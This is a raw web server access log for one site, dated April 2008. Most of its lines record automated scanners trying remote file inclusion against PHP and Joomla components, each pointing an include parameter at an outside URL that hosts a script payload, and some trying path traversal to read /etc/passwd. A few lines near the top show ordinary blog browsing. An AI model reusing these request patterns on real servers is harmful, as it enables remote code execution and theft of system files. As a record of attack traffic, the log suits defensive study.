70.244.197.249 - - [10/Apr/2008:10:15:16 -0700] "GET //zeroboard//skin/zero_vote/error.php?dir=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:17 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1013 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:18 -0700] "GET /blog/xmlrpc.php?rsd HTTP/1.1" 200 734 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:18 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:20 -0700] "GET /blog/wp-login.php HTTP/1.1" 200 1806 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:21 -0700] "GET /blog/wp-login.php?action=lostpassword HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:22 -0700] "GET /blog/wp-admin/wp-admin.css?version=2.3.3 HTTP/1.1" 200 19794 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:25 -0700] "GET /blog/index.php/comments/feed/ HTTP/1.1" 200 912 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:30 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.1" 200 7090 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:36 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/%22%22%20title=%22%22%3E%20%3Cabbr%20title=%22%22%3E%20%3Cacronym%20title=%22%22%3E%20%3Cb%3E%20%3Cblockquote%20cite=%22%22%3E%20%3Ccode%3E%20%3Cem%3E%20%3Ci%3E%20%3Cstrike%3E%20%3Cstrong%3E%20%3C/small HTTP/1.1" 404 5006 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:41 -0700] "GET /blog/index.php/2008/04/ HTTP/1.1" 200 6430 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:43 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 1690 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:48 -0700] "GET /blog/xmlrpc.php HTTP/1.1" 200 59 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:50 -0700] "GET /blog/index.php/2008/04/03/hello-world/%22%22%20title=%22%22%3E%20%3Cabbr%20title=%22%22%3E%20%3Cacronym%20title=%22%22%3E%20%3Cb%3E%20%3Cblockquote%20cite=%22%22%3E%20%3Ccode%3E%20%3Cem%3E%20%3Ci%3E%20%3Cstrike%3E%20%3Cstrong%3E%20%3C/small HTTP/1.1" 404 5006 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:54 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.1" 200 6410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:57 -0700] "GET /blog/ HTTP/1.1" 200 7372 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:16:06 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:10:16:09 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
82.96.85.9 - - [10/Apr/2008:10:16:37 -0700] "GET /logs/access_080401.log/db.php?path_local=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.85.9 - - [10/Apr/2008:10:16:38 -0700] "GET /db.php?path_local=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.85.9 - - [10/Apr/2008:10:16:38 -0700] "GET /logs/db.php?path_local=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:16:41 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:10:17:07 -0700] "GET /logs/access.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:10:17:07 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:10:17:07 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:18:21 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:18:21 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:18:22 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:10:18:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.96.85.9 - - [10/Apr/2008:10:18:49 -0700] "GET /logs/access_080329.log/db.php?path_local=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.105 - - [10/Apr/2008:10:19:41 -0700] "GET /logs/access_080108.log/components/com_events/events_config.php?mosConfig_absolute_path=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.105 - - [10/Apr/2008:10:19:41 -0700] "GET /components/com_events/events_config.php?mosConfig_absolute_path=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.105 - - [10/Apr/2008:10:19:41 -0700] "GET /logs/components/com_events/events_config.php?mosConfig_absolute_path=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [10/Apr/2008:10:20:47 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.archfuck.ru/administrator/components/com_remository/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.1.62.200 - - [10/Apr/2008:10:20:47 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.archfuck.ru/administrator/components/com_remository/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:10:20:57 -0700] "GET //codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:10:20:58 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [10/Apr/2008:10:21:27 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [10/Apr/2008:10:21:28 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [10/Apr/2008:10:21:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.16.55 - - [10/Apr/2008:10:22:14 -0700] "GET /logs/access_080213.log/scanhttp://franklynlodge.com/templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.16.55 - - [10/Apr/2008:10:22:14 -0700] "GET /scanhttp://franklynlodge.com/templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.16.55 - - [10/Apr/2008:10:22:14 -0700] "GET /logs/scanhttp://franklynlodge.com/templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.16.55 - - [10/Apr/2008:10:22:15 -0700] "GET /logs/access_080201.log/scanhttp://franklynlodge.com/templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:22:17 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:22:17 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:22:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.16.55 - - [10/Apr/2008:10:22:20 -0700] "GET /scanhttp://franklynlodge.com/templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:10:22:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.154 - - [10/Apr/2008:10:23:18 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.195.37.167 - - [10/Apr/2008:10:23:35 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 1095122 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.34.173.70 - - [10/Apr/2008:10:23:42 -0700] "GET /logs/access_080313.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://frenchcoast.org/tikiwiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.173.70 - - [10/Apr/2008:10:23:42 -0700] "GET /logs/access_080313.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.semiahmoodle.net/wiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.173.70 - - [10/Apr/2008:10:23:42 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://frenchcoast.org/tikiwiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.173.70 - - [10/Apr/2008:10:23:42 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.semiahmoodle.net/wiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.16.55 - - [10/Apr/2008:10:23:54 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://franklynlodge.com/templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:24:08 -0700] "GET /logs/access_080123.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:24:08 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:24:09 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:10:24:16 -0700] "GET //codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.173.70 - - [10/Apr/2008:10:24:32 -0700] "GET /logs/access_080218.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://frenchcoast.org/tikiwiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.142.80.108 - - [10/Apr/2008:10:24:44 -0700] "GET /logs/access_080308.log/modules/My_eGallery/index.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.173.70 - - [10/Apr/2008:10:24:44 -0700] "GET /logs/access_080218.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.semiahmoodle.net/wiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.142.80.108 - - [10/Apr/2008:10:24:45 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:24:46 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:24:47 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:24:47 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.142.80.108 - - [10/Apr/2008:10:24:49 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:25:42 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:10:26:11 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:10:26:14 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:10:26:14 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:26:22 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:26:23 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:26:23 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [10/Apr/2008:10:26:41 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.53.240.146 - - [10/Apr/2008:10:26:41 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.104.78.250 - - [10/Apr/2008:10:27:01 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
89.104.78.250 - - [10/Apr/2008:10:27:01 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
217.144.192.7 - - [10/Apr/2008:10:27:08 -0700] "GET /logs/access_080308.log/phpbb/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.144.192.7 - - [10/Apr/2008:10:27:09 -0700] "GET /phpbb/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.144.192.7 - - [10/Apr/2008:10:27:09 -0700] "GET /logs/phpbb/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:10:27:14 -0700] "GET /logs/%22index.php?pagina=%22+.rohttp://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:10:27:18 -0700] "GET /%22index.php?pagina=%22+.rohttp://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.150.180.10 - - [10/Apr/2008:10:27:48 -0700] "GET /logs/access_080308.log/phpplus/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.150.180.10 - - [10/Apr/2008:10:27:48 -0700] "GET /logs/access_080308.log/forums/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.150.180.10 - - [10/Apr/2008:10:27:48 -0700] "GET /phpplus/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.150.180.10 - - [10/Apr/2008:10:27:48 -0700] "GET /forums/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.150.180.10 - - [10/Apr/2008:10:27:48 -0700] "GET /logs/phpplus/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.150.180.10 - - [10/Apr/2008:10:27:48 -0700] "GET /logs/forums/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:27:49 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:27:50 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:27:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [10/Apr/2008:10:27:52 -0700] "GET /config.inc.php?path_escape=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:10:27:52 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.150.180.10 - - [10/Apr/2008:10:27:57 -0700] "GET /logs/access_080308.log/forum/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.150.180.10 - - [10/Apr/2008:10:27:58 -0700] "GET /forum/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.150.180.10 - - [10/Apr/2008:10:27:58 -0700] "GET /logs/forum/language/lang_german/lang_main_album.php?phpbb_root_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:28:05 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:28:05 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:28:06 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:28:13 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.199.175 - - [10/Apr/2008:10:28:15 -0700] "GET /logs/access_080223.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.199.175 - - [10/Apr/2008:10:28:15 -0700] "GET //components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.199.175 - - [10/Apr/2008:10:28:15 -0700] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.240.146 - - [10/Apr/2008:10:28:16 -0700] "GET /logs//login.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.53.240.146 - - [10/Apr/2008:10:28:16 -0700] "GET //login.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.38.199.175 - - [10/Apr/2008:10:28:20 -0700] "GET /logs/access_080313.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [10/Apr/2008:10:28:24 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.archfuck.ru/administrator/components/com_remository/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:28:28 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:10:28:34 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.134.4.147 - - [10/Apr/2008:10:28:35 -0700] "GET /logs/access_080213.log/scanhttp://franklynlodge.com/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
